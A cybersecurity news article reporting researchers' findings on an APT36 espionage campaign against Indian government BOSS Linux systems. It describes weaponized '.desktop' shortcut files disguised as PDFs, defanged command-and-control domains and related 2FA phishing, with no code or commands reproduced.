Fake Meeting Files Used In Cyber Espionage Campaign Against India

APT36 hackers from Pakistan have been found using weaponized shortcut files, phishing, malware, and 2FA theft to attack BOSS Linux systems in India.

The Pakistan-based hacker group APT36 also known as Transparent Tribe has started a new cyber-espionage operation against Indian government systems , according to research by CYFIRMA.

The group has created malware designed for India’s BOSS Linux operating system, demonstrating their growing capability to adapt to different environments.

The attack begins with spear phishing emails containing a file named “Meeting_Notice_Ltr_ID1543ops.pdf_.zip.” Once opened, it reveals a fake shortcut file called “Meeting_Ltr_ID1543ops.pdf.desktop.” Though it looks like a harmless PDF, the file is programmed to secretly download malicious software.

“The ‘.desktop’ file shown is crafted to masquerade as an ordinary PDF shortcut but contains a chain of commands embedded in its Exec= line that are executed automatically and sequentially as soon as the file is launched. This enables the attacker to perform covert actions while keeping the victim unaware,” the researchers explained.

The malware employs deceiving methods to remain undetected by opening a genuine PDF in Firefox which makes users believe nothing suspicious occurred.

The hidden program operates in stealth mode stealing data, and sets itself to restart every time the computer is turned on.

The malicious files discovered by CYFIRMA connect to two newly registered domains “securestore[.]cv” and “modgovindia[.]space” which serve as command-and-control servers for the attackers. Through these servers hackers can transmit commands and obtain stolen data while maintaining their access to government networks.

CYFIRMA says APT36 operates as a state-sponsored group that has been active for more than ten years, targeting primarily Indian government institutions along with military, and diplomatic organizations.

Hacker News reports that this campaign shows APT36’s growing sophistication. In addition to targeting Linux BOSS, the group has also developed Windows malware in the same campaign, demonstrating a dual-platform approach.

The malicious code performs system reconnaissance while executing fake anti-debugging and anti-sandbox checks to avoid detection, according to CloudSEK. The attacks led to the deployment of the Transparent Tribe backdoor Poseidon, which allows attackers to steal credentials, and conduct long-term surveillance, as well as network lateral movement inside government networks, as reported by Hunt.io researchers.

Hacker News notes that  activity comes shortly after Transparent Tribe was caught targeting Indian defense organizations through spoofed login portals designed to steal credentials and even Kavach, the Indian government’s two-factor authentication (2FA) system.

Victims entering their email and Kavach codes on the phishing sites unknowingly handed over login data directly to attackers.

CYFIRMA noted: “APT36’s capability to customize its delivery mechanisms according to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls.

CYFIRMA warned that “the analysis indicates a coordinated cyber-espionage campaign attributed to APT36, leveraging weaponized .desktop files to target BOSS Linux environments within Indian Government entities.”